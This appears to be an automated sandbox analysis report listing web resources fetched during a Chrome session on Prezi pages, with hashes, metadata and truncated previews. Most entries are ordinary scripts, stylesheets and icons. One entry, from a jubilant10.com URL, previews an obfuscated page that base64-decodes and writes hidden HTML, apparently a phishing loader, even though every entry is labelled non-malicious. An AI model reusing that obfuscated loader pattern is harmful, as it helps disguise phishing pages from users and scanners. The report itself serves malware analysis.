                                                                                                                                                                                              Preview:.footer-container,.footer-container-mobile{background-color:#F3F5F9}.footer-container.footer-padding,.footer-container-mobile.footer-padding{padding:60px 0 30px 0}.footer-container.footer-padding-mobile,.footer-container-mobile.footer-padding-mobile{padding:30px 0}.footer-container ul,.footer-container-mobile ul{list-style:none;margin-bottom:36px}.footer-container-no-margin-bottom-ul ul{margin-bottom:0;padding-bottom:10px}.footer-container-no-margin-bottom-ul ul.btm-18{margin-bottom:18px}@media (min-width:768px){.footer-container-no-margin-bottom-ul ul.infogram-btm{margin-bottom:36px}}@media (min-width:992px){.footer-container-no-margin-bottom-ul ul.infogram-btm{margin-bottom:0}}.text-gray-3{color:#8E939C}.no-underline:hover{text-decoration:none}.no-underline:focus{text-decoration:none}.icons{margin-right:6px;opacity:0.7;transition:all 200ms ease}.icons:hover{opacity:1}.footer-list-container{padding-right:24px}.footer-list-container li{line-height:0;margin-bottom:9px}.footer-title{marg
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (64695)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):69952
                                                                                                                                                                                              Entropy (8bit):5.2982858448603425
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:913AC31FC68D7B9E02BD9F2A890D1778
                                                                                                                                                                                              SHA1:D6ABAC4536B6969F0085B6892512B8E383F9285A
                                                                                                                                                                                              SHA-256:DD45BE86B051889AECBDBB940A135E789ACCE691AFC232C7F0176F534517ACC0
                                                                                                                                                                                              SHA-512:63FFE7B2ADCB557A4C05CC66B9D6564FCB9120A7B0B0DD370CE4CE645AD63C96CFE6B421FE26599AEE1CD08A83A725EF0837169D24EA7E0BFCA6A1B55808FFFC
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://js.hs-analytics.net/analytics/1730910000000/20307117.js
                                                                                                                                                                                              Preview:/** . * HubSpot Analytics Tracking Code Build Number 1.993. * Copyright 2024 HubSpot, Inc. http://www.hubspot.com. */.var _hsq = _hsq || [];._hsq.push(['setPortalId', 20307117]);._hsq.push(['trackPageView']);._hsq.push(['setLegacy', false]);._hsq.push(['addHashedCookieDomain', '224894981']);._hsq.push(['addHashedCookieDomain', '233546881']);._hsq.push(['addHashedCookieDomain', '108475037']);._hsq.push(['addHashedCookieDomain', '20629287']);._hsq.push(['addHashedCookieDomain', '251652889']);._hsq.push(['enableAutomaticLinker', true]);._hsq.push(['embedHubSpotScript', 'https://js-na1.hs-scripts.com/20307117.js', 'hs-script-loader']);._hsq.push(['initEventVisualizerScript']);._hsq.push(['setTrackingDomain', 'track.hubspot.com']);./** _anon_wrapper_ **/ (function() {./*! For license information please see hsa-prod.js.LICENSE.txt */.(hstc=hstc||{}).JS_VERSION=1.1;hstc.ANALYTICS_HOST="track.hubspot.com";(hstc=hstc||{}).Math={uuid:function(){if(window.navigator.userAgent.indexOf("googlewebli
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (65487)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):96951
                                                                                                                                                                                              Entropy (8bit):5.288734807332958
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:E3E296E62F9ED48D9690B85B37CF7D2C
                                                                                                                                                                                              SHA1:57E75BCA4B8F9B6F9DF995A7545C21EC39034B34
                                                                                                                                                                                              SHA-256:0FD839C7A31E4EDC02934504F4588F468F021922519694AB4F821CB483B88E85
                                                                                                                                                                                              SHA-512:12A6B54D206E52C7E173100FF2BF73D4B6B7CE84E6AA030EA7A8A1FEDD09D764F4BC4778E8BD8F523208B1D951E3FCB2197FB3459FFD340B5638001097EC4F4A
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://assets.asosservices.com/shared/jquery.742e47af.js
                                                                                                                                                                                              Preview:/*! v1.12.3, license file: jquery.LICENSE.txt */.!function(){"use strict";var e,t;e=window,t=function(e,t){var n=[],r=e.document,i=n.slice,o=n.concat,a=n.push,s=n.indexOf,u={},l=u.toString,c=u.hasOwnProperty,f={},d=function(e,t){return new d.fn.init(e,t)},p=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,h=/^-ms-/,g=/-([\da-z])/gi,m=function(e,t){return t.toUpperCase()};function v(e){var t=!!e&&"length"in e&&e.length,n=d.type(e);return"function"!==n&&!d.isWindow(e)&&("array"===n||0===t||"number"==typeof t&&t>0&&t-1 in e)}d.fn=d.prototype={jquery:"1.12.3",constructor:d,selector:"",length:0,toArray:function(){return i.call(this)},get:function(e){return null!=e?e<0?this[e+this.length]:this[e]:i.call(this)},pushStack:function(e){var t=d.merge(this.constructor(),e);return t.prevObject=this,t.context=this.context,t},each:function(e){return d.each(this,e)},map:function(e){return this.pushStack(d.map(this,(function(t,n){return e.call(t,n,t)})))},slice:function(){return this.pushStack(i.apply(this,argumen
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):1104
                                                                                                                                                                                              Entropy (8bit):4.655188383623911
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:A4C5DA628362A2B4D05A7979C0CA106C
                                                                                                                                                                                              SHA1:49DAE26BD2FE4F720F4A1696EBAFCA2639234D33
                                                                                                                                                                                              SHA-256:BB20585AFE2B815494A40D78682CB6550404D43339C074070CBE692D041F23A8
                                                                                                                                                                                              SHA-512:B2843B801F08491E284643AE1E9389CC09926F0C42D6BB2F8F224542E45826EA77FA3CB484CE05BCC07939063F138CEF3A25E2E16D2CDD42EBD2EA27F3282CC2
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:"https://prezi.com/api/v2/fonts/stylesheet/?fontFamily=Raleway,Roboto,Roboto,Raleway"
                                                                                                                                                                                              Preview:@font-face {. font-family: "Roboto";. src: url("/api/v1/fonts/Roboto-Regular2/");. font-weight: normal;. font-style: normal;.}.@font-face {. font-family: "Roboto";. src: url("/api/v1/fonts/Roboto-Italic/");. font-weight: normal;. font-style: italic;.}.@font-face {. font-family: "Roboto";. src: url("/api/v1/fonts/Roboto-Bold2/");. font-weight: bold;. font-style: normal;.}.@font-face {. font-family: "Roboto";. src: url("/api/v1/fonts/Roboto-BoldItalic/");. font-weight: bold;. font-style: italic;.}.@font-face {. font-family: "Raleway";. src: url("/api/v1/fonts/Raleway-Regular/");. font-weight: normal;. font-style: normal;.}.@font-face {. font-family: "Raleway";. src: url("/api/v1/fonts/Raleway-Italic/");. font-weight: normal;. font-style: italic;.}.@font-face {. font-family: "Raleway";. src: url("/api/v1/fonts/Raleway-Bold/");. font-weight: bold;. font-style: normal;.}.@font-face {. font-family: "Ralewa
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (4857), with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):4857
                                                                                                                                                                                              Entropy (8bit):5.839862070480798
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:6FE6BFF2874B8B3B2F3902614F49B12F
                                                                                                                                                                                              SHA1:73C45ED1AB4082C3F944ECF5CE6ADB272895F063
                                                                                                                                                                                              SHA-256:30D92BBD5C0497052AE4F3FCEE181F9ED87F316142CEAF1B6EFDB0CFA82AD3B5
                                                                                                                                                                                              SHA-512:26103640A6C3A84A99926FCC3777DEFB5428A66AD5FF69FB21A2832C6D5339C7FB070A1651D18444884EE86508A96E98475EB5A564E02D59833B6D48B1B5A5DF
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (5465), with CRLF line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):15962
                                                                                                                                                                                              Entropy (8bit):5.927905056231104
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:E06C3FC2586192D8C05B0CAB0DB94D51
                                                                                                                                                                                              SHA1:C620BEC513BCDB0F46938F730DE29B39829EC402
                                                                                                                                                                                              SHA-256:110063FFF38C384249551FBED421F775D16493347FEFE03968E6729C31B802B5
                                                                                                                                                                                              SHA-512:2D765BC14D316D7ED16CE3D9FAE26341E8258AFB2EDD5B2F8561EAE55C7787D57054461BC34193CA9E96BD8405ABBF94EC9983782F5E508C9955681B1207391D
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://ohp.jubilant10.com/9AcwW8rx6XRE_VpnT9ifNcc/
                                                                                                                                                                                              Preview: You know you are on the road to success if you would do your job, and not be paid for it. -->..<script>../* The way to get started is to quit talking and begin doing. */..if(atob("aHR0cHM6Ly9qbS5qdWJpbGFudDEwLmNvbS85QWN3VzhyeDZYUkVfVnBuVDlpZk5jYy8=") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wI
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):1327
                                                                                                                                                                                              Entropy (8bit):5.353759587857711
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:1AA2C19A21128E162921410EDC867FCE
                                                                                                                                                                                              SHA1:5FA9A5BA1B9D2A37E0419AD27DF27CD0A8A317F6
                                                                                                                                                                                              SHA-256:C6EFBAC4C969E83D254E91E4BFA5F350B432EB9B879FE1A6FAFEEEFF1355CE5D
                                                                                                                                                                                              SHA-512:AAE2EA245FDCC91279642BCD53E22B7E341FBE0ABD017976ADB870BEEA23D9842566FC812A31B733DC6BC8534B6C0961F5710829158D0EF0D3826606AA95BB97
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://assets.prezicdn.net/assets-versioned/prezipage-versioned/5255-770009b/common/img/footers/twitter-icon.svg
                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 19.2.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. width="20px" height="16px" viewBox="0 0 20 16" style="enable-background:new 0 0 20 16;" xml:space="preserve">.<style type="text/css">...st0{fill:#152235;}.</style>.<title>twitter</title>.<desc>Created with Sketch.</desc>.<g id="Page-2">..<g id="Payment-page-Copy-16" transform="translate(-825.000000, -719.000000)">...<g id="twitter" transform="translate(825.000000, 719.000000)">....<g id="Twitter">.....<path id="Shape" class="st0" d="M17.3,4.2c0,0.2,0,0.3,0,0.5c0,5-3.8,10.7-10.7,10.7c-2.1,0-4.1-0.6-5.8-1.7......c0.3,0,0.6,0.1,0.9,0.1c1.8,0,3.4-0.6,4.7-1.6c-1.7,0-3-1.1-3.5-2.6c0.2,0,0.5,0.1,0.7,0.1c0.3,0,0.7,0,1-0.1......c-1.7-0.3-3-
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):367
                                                                                                                                                                                              Entropy (8bit):4.91512135645049
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:5E58B5B139E41CC0645ADA25F7D29F09
                                                                                                                                                                                              SHA1:9161EAC1663B931DC69EAD690AF33CE968AD4E0C
                                                                                                                                                                                              SHA-256:CA98E42319955E993F6CE9AF1B31C69054E260147F9B3AD6DBBB4DD4D36E5DDA
                                                                                                                                                                                              SHA-512:162AD1019859187E3CD71A23132F843734B1E06BCADAFEF73F15C965D1CB26E1798A56CC0A5F12A1BF8CDEF7452A21B6808FAB71A1980053E8AF3AD1AE7BD7E0
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<path fill-rule="evenodd" clip-rule="evenodd" d="M12.0002 10.5858L7.75748 6.34314L6.34326 7.75735L10.5859 12L6.3433 16.2427L7.75752 17.6569L12.0002 13.4142L16.2428 17.6568L17.657 16.2426L13.4144 12L17.657 7.75739L16.2428 6.34317L12.0002 10.5858Z" fill="#000000"/>.</svg>.
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (815)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):3501
                                                                                                                                                                                              Entropy (8bit):5.383873370647921
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:147FD3B00C22BA9C939712E9213C24CA
                                                                                                                                                                                              SHA1:3B48369B86FA0574F35379AACD1F42CC9C98A52B
                                                                                                                                                                                              SHA-256:70F5B11C1870CF90201A6D5F770CA318A3FA5827C74A8765EDE22B487F7D4532
                                                                                                                                                                                              SHA-512:E8419A71232EDAC8FD131446777F7D034B3171EFE07B3267479B439E4982650DB65A0D1DDC9F516315D5ED1B01ECFD2F7EB55D75D44AA51EE0AD494D441586D2
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://www.googletagmanager.com/static/service_worker/4al0/sw_iframe.html?origin=https%3A%2F%2Fprezi.com
                                                                                                                                                                                              Preview:<!DOCTYPE html>.<html>.<head>. <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon">.</head>.<body>. <script>.'use strict';class m{constructor(a){this.j=a;this.g={};this.h={};this.i=0;this.id=String(Math.floor(Number.MAX_SAFE_INTEGER*Math.random()))}}function n(a){return a.performance&&a.performance.now()||Date.now()}.var p=function(a,b){class d{constructor(c,g,f){this.failureType=c;this.data=g;this.g=f;this.h=new m(n(f))}s(c,g){const f=c.clientId;if(c.type===0){c.isDead=!0;var e=this.h,h=n(this.g);e.g[f]==null&&(e.g[f]=0,e.h[f]=h,e.i++);e.g[f]++;c.stats={targetId:e.id,clientCount:e.i,totalLifeMs:Math.round(h-e.j),heartbeatCount:e.g[f],clientLifeMs:Math.round(h-e.h[f])}}c.failure={failureType:this.failureType,data:this.data};g(c)}}return new d(5,a,b)};/*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/.let q=globalThis.trustedTypes,r;function t(){let a=null;if(!q)return a;try{const b=d=>d;a=q.createPolicy("goog#html",{createHTML:b,createScript:b,crea
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):2231
                                                                                                                                                                                              Entropy (8bit):7.877156371855539
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:3DB9E52F0236368C12A29D95BC940531
                                                                                                                                                                                              SHA1:DEA098ED21582C63B8828A7EA8201F946843F6EC
                                                                                                                                                                                              SHA-256:C13E7E8FC0A40CDBFD2FE608AC748EF21CB6DEFFFABBB61F80BDC90AC4492096
                                                                                                                                                                                              SHA-512:8EFB65F053679C960CD8A34F46B53D8F113F251F920DC82F5D40779A65C91E5D245A3F6824A1AF0F9351E90D95AD3218E72C8348D40D28CCCD67FA7492F036DD
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:.PNG........IHDR...P...P............sRGB........qIDATx...o.E....8.=.I/i.."."..@QT..(.U.+U...*!....x...\!A..R.Q$....(i.&i.I..I.;..^.o.q7N|....9........|fg....4p...=.m.t.A9I>..rz.C.~.'..r..n.,.....c.}....Y...6...%#.t..:.2+..IE.h.m....-.Nl..'...;.,..6.....`.~.:...,C_.'.m_.9..$.n..-..}.w..=..5.c....zp.P<..Y*"x.C...=.+.|.Ut.X......qk...+..~...+....&w...a.l.Q..k...a..?l..;".vJ.......x>.......`.D.P.4a$.Ju...2;_...j...a{^r...uH....mI'_U.;.L@r-..mm..io.+.\.EN..E...z...8..MJ....L6..U.L....).u&.no..w..}?fm.PK...3.8......x..$<Ag..l.(!F.Dz.....&..z.....~#.uf...Y8...id...-....0.......'w@$1..)r.....@b....@.+...7.v,S..2\d.A.......3T.......iN;......]<.l....,.p....8%.8.4...`.{..Eu..q.Ls.,...3u..5.)v.h*..f......N.P...4J.{.._)....X..............T..S...._.LC=.LA@...q.."M..*2S\#....+.Syk....~24R.I....(i.0Vn....+.S#._...\.......i....u.7)..V:.rf...?b....l..X.T.:.h.W.z$X..j"E.@D\.dG@..;...s.,.......hV...?...t.......F../..J......yG2.:....=.`...>.Q@m..2....NeX......Nm.G/y,.
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (22830)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):572418
                                                                                                                                                                                              Entropy (8bit):5.419117607547993
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:A49AEEE9DAD4A88F2FDC70B8775B3024
                                                                                                                                                                                              SHA1:343F4BD9BD20F8F51871EB47781A29BC69EB0D97
                                                                                                                                                                                              SHA-256:C039EF317385BB7D451BC72AF9BB6B772FA88AF0152FE67D081984B365BD3A61
                                                                                                                                                                                              SHA-512:47812F3B6169FD5DEE948C2CDCC63867E02562F7C0739F0D82CD1943964682CA7B9B0EC47DCCAF16C1A204FDE2B9B0FECDA6F417070AD0C9536B37D4AD9B6936
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://package-bundles.prezi.com/design-view-page/design-view-page.0.1.782/design-view-page.js
                                                                                                                                                                                              Preview:var DesignViewPageModule=function(e){var t={};function n(r){if(t[r])return t[r].exports;var o=t[r]={i:r,l:!1,exports:{}};return e[r].call(o.exports,o,o.exports,n),o.l=!0,o.exports}return n.m=e,n.c=t,n.d=function(e,t,r){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:r})},n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var o in e)n.d(r,o,function(t){return e[t]}.bind(null,o));return r},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=286)}([function(e,t){e.exports=React},function(e,t,n){"use str
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (9217)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):244295
                                                                                                                                                                                              Entropy (8bit):5.454185343611895
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:B5322CFCA51C69074051C6B148CE5A6C
                                                                                                                                                                                              SHA1:A995F0F78FE3147A4BF3D0503F9A123FDDAD0CD0
                                                                                                                                                                                              SHA-256:55270971FDC4172D5CBBA95DADD779074EADB9C50BF16C2B3253CCC6BC8FC363
                                                                                                                                                                                              SHA-512:9D1824E860609AF7AB2775ACE28D22DED11D4678B89351B34BC03A54527D7C3029238DE45C126E52150B9A87F9242039679F3A646A2F5C7E46D66EE19BB051BE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://connect.facebook.net/en_US/fbevents.js
                                                                                                                                                                                              Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (2345)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):249625
                                                                                                                                                                                              Entropy (8bit):5.54905217863966
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:1FA2B1F1514EC9700895F10C7DFCDE3D
                                                                                                                                                                                              SHA1:0E24134D73F4EF69965C0F1C0D1FF062570B0CF7
                                                                                                                                                                                              SHA-256:BEBD9E3CC68D7A1E99E1A9385970360CDB58099C154E59AE1A4AC0DB4FD5B3CE
                                                                                                                                                                                              SHA-512:7C7E497B3B23B715341010E7671BEF637CDCFB4ABB539BB1AF233946E3C717FEF66509A307AAF113268F6CF2ACBF1CDA89CA3872A619FD7A5183B2F86439F7D5
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://www.googletagmanager.com/gtag/destination?id=AW-AW-958692981&l=dataLayer&cx=c
                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__cid"}],. "tags":[{"function":"__rep","once_per_event":true,"vtp_containerId":["macro",1],"tag_id":1}],. "predicates":[{"function":"_eq","arg0":["macro",0],"arg1":"gtm.js"}],. "rules":[[["if",0],["add",0]]].},."runtime":[ [50,"__cid",[46,"a"],[36,[17,[13,[41,"$0"],[3,"$0",["require","getContainerVersion"]],["$0"]],"containerId"]]]. ,[50,"__e",[46,"a"],[36,[13,[41,"$0"],[3,"$0",["require","internal.getEventData"]],["$0","event"]]]]. .].,"entities":{."__cid":{"2":true,"4":true,"3":true}.,."__e":{"2":true,"4":true}...}.,"blob":{"1":"1"}.,"permissions":{."__cid":{"read_container_data":{}}.,."__e":{"read_event_data":{"eventDataAccess":"specific","keyPatterns":["event"]}}...}....,"security_groups":{."google":[."__cid".,."__e"..]...}....};.....var h,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{d
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65530), with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):698803
                                                                                                                                                                                              Entropy (8bit):5.382890362603205
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:E33871BE919CBA88236D72F0B20E53B7
                                                                                                                                                                                              SHA1:CBEB9EFEE5E76D6D9E06E471FB370D5D27A72122
                                                                                                                                                                                              SHA-256:07610D0A6E7ECED869BED66BB3B8F9222535F4766006B6467AA0F7BB1167D14B
                                                                                                                                                                                              SHA-512:593448200ADDC9A92F0050F476038C5519D5D3FFF2E12490D45E312B5C6F3CD911C988FE08B1266CA7BFF83CF4C7176E17CDDAB9304F72A98686B4A39ECE83ED
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://js.stripe.com/v3
                                                                                                                                                                                              Preview:!function(){function e(t){var n=o[t];if(void 0!==n)return n.exports;var i=o[t]={id:t,loaded:!1,exports:{}};return r[t](i,i.exports,e),i.loaded=!0,i.exports}var t,n,r={723:function(e,t,n){"use strict";function r(e){l.length||(a(),!0),l[l.length]=e}function o(){for(;d<l.length;){var e=d;if(d+=1,l[e].call(),d>1024){for(var t=0,n=l.length-d;t<n;t++)l[t]=l[t+d];l.length-=d,d=0}}l.length=0,d=0,!1}function i(e){return function(){function t(){clearTimeout(n),clearInterval(r),e()}var n=setTimeout(t,0),r=setInterval(t,50)}}e.exports=r;var a,c,s,u,l=[],d=0,p=void 0!==n.g?n.g:self,m=p.MutationObserver||p.WebKitMutationObserver;"function"==typeof m?(c=1,s=new m(o),u=document.createTextNode(""),s.observe(u,{characterData:!0}),a=function(){c=-c,u.data=c}):a=i(o),r.requestFlush=a,r.makeRequestCallFromTimer=i},5937:function(e,t,n){e.exports=n.p+"fingerprinted/img/abnamro-4445e65420800f96f68cfc67a273f66b.svg"},1520:function(e,t,n){e.exports=n.p+"fingerprinted/img/asn-3d9b1bbff2f8f12105510992dbb37ae8.svg
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (2791), with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):2791
                                                                                                                                                                                              Entropy (8bit):5.565066673594193
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:3A85BA5E0391463337329C3E25E6D717
                                                                                                                                                                                              SHA1:A885C62171605BD6CEEF283EAE5A9F45FF875E22
                                                                                                                                                                                              SHA-256:1D410365F7D5368D041C68368842E3486899957E84BFD7EE02B379F68C48B7B9
                                                                                                                                                                                              SHA-512:78CE6411AA85FD4463AA619DD02988AA158F64CC18D074EEB3DF773D27E4D83AD339E2715F4EBDE85853BC3C0E4A679BCBBE90ECF5A4900CBF63D987E3F241CC
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
